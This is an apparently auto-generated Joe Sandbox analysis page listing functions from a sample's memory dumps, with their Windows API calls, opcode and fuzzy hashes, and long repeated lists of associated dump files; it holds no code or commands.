Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: CreateFile
String ID: C
API String ID: 823142352-1037565863
Opcode ID: 310ce58fab8fab51de2ee8fa85a1ffdc09519a5fdfeee6aa922503d4e8b4be1c
Instruction ID: 979b125c5e5f2200798eef055fe55b18e0a5949f9e5a3637c8fef52fa442ebc7
Opcode Fuzzy Hash: 310ce58fab8fab51de2ee8fa85a1ffdc09519a5fdfeee6aa922503d4e8b4be1c
Instruction Fuzzy Hash: 8A016BB708C1093DD7144E259C55BDF7B6EEB93730F300229F105A1592E6D11F0AAA28

Function 00FB3623 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(000000E4), ref: 00FB366D

Strings

C, xrefs: 00FB399C

Memory Dump Source

Source File: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499888723.0000000000FD4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499909568.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499929421.0000000000FD7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499955459.0000000000FED000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499978714.0000000000FEE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500000700.0000000000FF5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500045417.000000000100F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500070143.0000000001016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500092234.0000000001017000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500119525.0000000001018000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500143576.0000000001019000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500165950.000000000101A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500189364.0000000001025000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500214005.0000000001026000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500240117.0000000001027000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500263913.000000000102E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500286419.0000000001039000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500308170.0000000001041000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500327685.0000000001042000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500353961.0000000001044000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500376629.0000000001052000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500399793.0000000001053000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500419986.0000000001054000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500443491.000000000105B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500468625.0000000001062000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500489288.0000000001064000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500511782.0000000001065000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500536578.000000000106D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: CreateFile
String ID: C
API String ID: 823142352-1037565863
Opcode ID: 2ed9e8e215a06e99bbe0a7a0897de2474ae292c1044c31a6346ca9fa797e682a
Instruction ID: 755d01bbba0b5984b1945a0d9397cfb98bb956e8a4d8d28164b4ebb7be9aec70
Opcode Fuzzy Hash: 2ed9e8e215a06e99bbe0a7a0897de2474ae292c1044c31a6346ca9fa797e682a
Instruction Fuzzy Hash: 730126B328C20A7DD7009E268C94FEE3B5BD796360F305629E546D6682C2A11E067E28

Function 054B0D42 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 054B0DCD

Memory Dump Source

Source File: 00000004.00000002.2502825786.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_54b0000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: b56e47748463ccbf6763d1afa4eb410681cee17a074fdac5760dbfea4aa7da5f
Instruction ID: b4e2cb52492381a8cbc0553dfc5c296ea54b14e04d978732e081c35558803b80
Opcode Fuzzy Hash: b56e47748463ccbf6763d1afa4eb410681cee17a074fdac5760dbfea4aa7da5f
Instruction Fuzzy Hash: 422125B68042199FDB50CF99D884BDEFBB4FB88710F14815AD909AB244D7B4A540CBA4

Function 054B0D48 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 054B0DCD

Memory Dump Source

Source File: 00000004.00000002.2502825786.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_54b0000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: b18b773dffd0a8137011b0186973beed0cf7cc66bb0eed3294bb2bcc51c351b1
Instruction ID: fa91b57fc81c9b2688973dfb2d8865b294576f24909401f2e6ebb4516a09d83c
Opcode Fuzzy Hash: b18b773dffd0a8137011b0186973beed0cf7cc66bb0eed3294bb2bcc51c351b1
Instruction Fuzzy Hash: A32137B6C002099FDB50CF99D884BDEFBF4FB88710F14815AD909AB244D774A540CBA4

Function 054B1509 Relevance: 1.6, APIs: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32(?,?,?), ref: 054B1580

Memory Dump Source

Source File: 00000004.00000002.2502825786.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_54b0000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: 0af14de184a0e61d79e7a9cac256d15b158104df6ed7c90b3fa351071a5eac62
Instruction ID: a5c2371090d9b265769a9b3a42ac38051462f3ac0b41541f519fff42a6570fd4
Opcode Fuzzy Hash: 0af14de184a0e61d79e7a9cac256d15b158104df6ed7c90b3fa351071a5eac62
Instruction Fuzzy Hash: 8721F2B69002098FDB10CFAAC584BDEBBF4AB48324F10842AE559A3240D778A644CFA1

Function 054B1510 Relevance: 1.6, APIs: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32(?,?,?), ref: 054B1580

Memory Dump Source

Source File: 00000004.00000002.2502825786.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_54b0000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: 815893d79fc160a15f95e9e12902a60e309aed248ac0f1061d8baf0591502156
Instruction ID: 87c313a596eb036f4abc03c24cef0e939f677e66cf679d3096a02ff78e9bc1c9
Opcode Fuzzy Hash: 815893d79fc160a15f95e9e12902a60e309aed248ac0f1061d8baf0591502156
Instruction Fuzzy Hash: 8911D3B19043499FDB10CFAAC584BDEFBF4EB48320F10842AE559A3250D7B8A644CFA5

Function 054B1301 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 054B1367

Memory Dump Source

Source File: 00000004.00000002.2502825786.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_54b0000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 83d315279b20fd007f1fadba16a8972de4f36f3141af42ccdf093437c278bf1d
Instruction ID: cc73394b7b6179cb86bcbda131fac8627ddac54d926cf0f4dc7c70e41030a35f
Opcode Fuzzy Hash: 83d315279b20fd007f1fadba16a8972de4f36f3141af42ccdf093437c278bf1d
Instruction Fuzzy Hash: 3F1134B2804349CFEB10CFAAC445BDEFBF4EB48320F10846AD518A3640D7B8A540CBA1

Function 054B1308 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 054B1367

Memory Dump Source

Source File: 00000004.00000002.2502825786.00000000054B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_54b0000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 2fce09e15f1a430329ed6b70d940cfba32df864c62a836824d19d8fc1d2b97c7
Instruction ID: cdcb59a6c1658efc112941a54fa5f8a51356e27cb7c4e81bbafe4a57bc3a6ee1
Opcode Fuzzy Hash: 2fce09e15f1a430329ed6b70d940cfba32df864c62a836824d19d8fc1d2b97c7
Instruction Fuzzy Hash: 3011F5B1804349CFEB10CFAAC545BDEFBF4EB48724F24845AD518A3650D7B8A544CBA5

Function 00FB363D Relevance: 1.5, APIs: 1, Instructions: 39
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(000000E4), ref: 00FB366D

Memory Dump Source

Source File: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499888723.0000000000FD4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499909568.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499929421.0000000000FD7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499955459.0000000000FED000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499978714.0000000000FEE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500000700.0000000000FF5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500045417.000000000100F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500070143.0000000001016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500092234.0000000001017000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500119525.0000000001018000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500143576.0000000001019000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500165950.000000000101A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500189364.0000000001025000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500214005.0000000001026000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500240117.0000000001027000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500263913.000000000102E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500286419.0000000001039000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500308170.0000000001041000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500327685.0000000001042000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500353961.0000000001044000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500376629.0000000001052000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500399793.0000000001053000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500419986.0000000001054000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500443491.000000000105B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500468625.0000000001062000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500489288.0000000001064000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500511782.0000000001065000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500536578.000000000106D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6d91cfbd4c06e4f5e58adcb696138265e0e7d379af8fac12289df3063630bea7
Instruction ID: c0b6975201db05237dbb60543b0c876f031ce84ffe5a1ae8e4d85e71d1df17a6
Opcode Fuzzy Hash: 6d91cfbd4c06e4f5e58adcb696138265e0e7d379af8fac12289df3063630bea7
Instruction Fuzzy Hash: E8F050B31CD3523DE7018F568C64FAA7B6EDF57320F154499E040C7183D1601A056F38

Function 00FB3628 Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(000000E4), ref: 00FB366D

Memory Dump Source

Source File: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499888723.0000000000FD4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499909568.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499929421.0000000000FD7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499955459.0000000000FED000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499978714.0000000000FEE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500000700.0000000000FF5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500045417.000000000100F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500070143.0000000001016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500092234.0000000001017000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500119525.0000000001018000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500143576.0000000001019000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500165950.000000000101A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500189364.0000000001025000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500214005.0000000001026000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500240117.0000000001027000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500263913.000000000102E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500286419.0000000001039000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500308170.0000000001041000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500327685.0000000001042000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500353961.0000000001044000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500376629.0000000001052000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500399793.0000000001053000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500419986.0000000001054000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500443491.000000000105B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500468625.0000000001062000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500489288.0000000001064000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500511782.0000000001065000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500536578.000000000106D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f95113eda100c867e69469a79afb53982d778f0a4cf0a71bafa035a9cbb96e49
Instruction ID: 76fdd73736e432915bf1f188ae893551e53556b112de40346ca6c4886b559a17
Opcode Fuzzy Hash: f95113eda100c867e69469a79afb53982d778f0a4cf0a71bafa035a9cbb96e49
Instruction Fuzzy Hash: 52F05CF36CD2163CE7019E5B9C54FB9370FD795360F204439B040C7282D5B04A062E68

Function 00FB3658 Relevance: 1.5, APIs: 1, Instructions: 33
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(000000E4), ref: 00FB366D

Memory Dump Source

Source File: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499888723.0000000000FD4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499909568.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499929421.0000000000FD7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499955459.0000000000FED000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499978714.0000000000FEE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500000700.0000000000FF5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500021434.0000000001002000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500045417.000000000100F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500070143.0000000001016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500092234.0000000001017000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500119525.0000000001018000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500143576.0000000001019000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500165950.000000000101A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500189364.0000000001025000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500214005.0000000001026000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500240117.0000000001027000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500263913.000000000102E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500286419.0000000001039000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500308170.0000000001041000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500327685.0000000001042000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500353961.0000000001044000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500376629.0000000001052000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500399793.0000000001053000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500419986.0000000001054000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500443491.000000000105B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500468625.0000000001062000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500489288.0000000001064000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500511782.0000000001065000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500536578.000000000106D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500563125.0000000001080000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500587247.0000000001081000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010C9000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500626663.00000000010D0000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500677195.00000000010DE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2500702115.00000000010E0000.00000080.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e30000_ZXCELRXK9FXBC48TJDYH4AM8OTM.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a03e19692c853b765deb5fdaaf2e6425164c0d93c26b2ff9ac9aa5877ae7d07b
Instruction ID: cc5c5fdb90036e53ba3a078b546fae30a12b6c5ae6eb38112f6db70c88b9a6fa
Opcode Fuzzy Hash: a03e19692c853b765deb5fdaaf2e6425164c0d93c26b2ff9ac9aa5877ae7d07b
Instruction Fuzzy Hash: A7E022F268A3153CE701CF679CA9FAA778EEB85370F20962EF441C6581C6B01D065A28

Function 00FB38A0 Relevance: 1.5, APIs: 1, Instructions: 31
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(-00000017), ref: 00FB38F7

Memory Dump Source

Source File: 00000004.00000002.2499817397.0000000000FAC000.00000040.00000001.01000000.00000006.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000004.00000002.2499577326.0000000000E30000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499601402.0000000000E32000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499622986.0000000000E36000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499645120.0000000000E3A000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499666484.0000000000E46000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499769729.0000000000F97000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499791416.0000000000F99000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2499869034.0000000000FD3000.00000080.00000001.01000000.00000006.sdmpDownload File
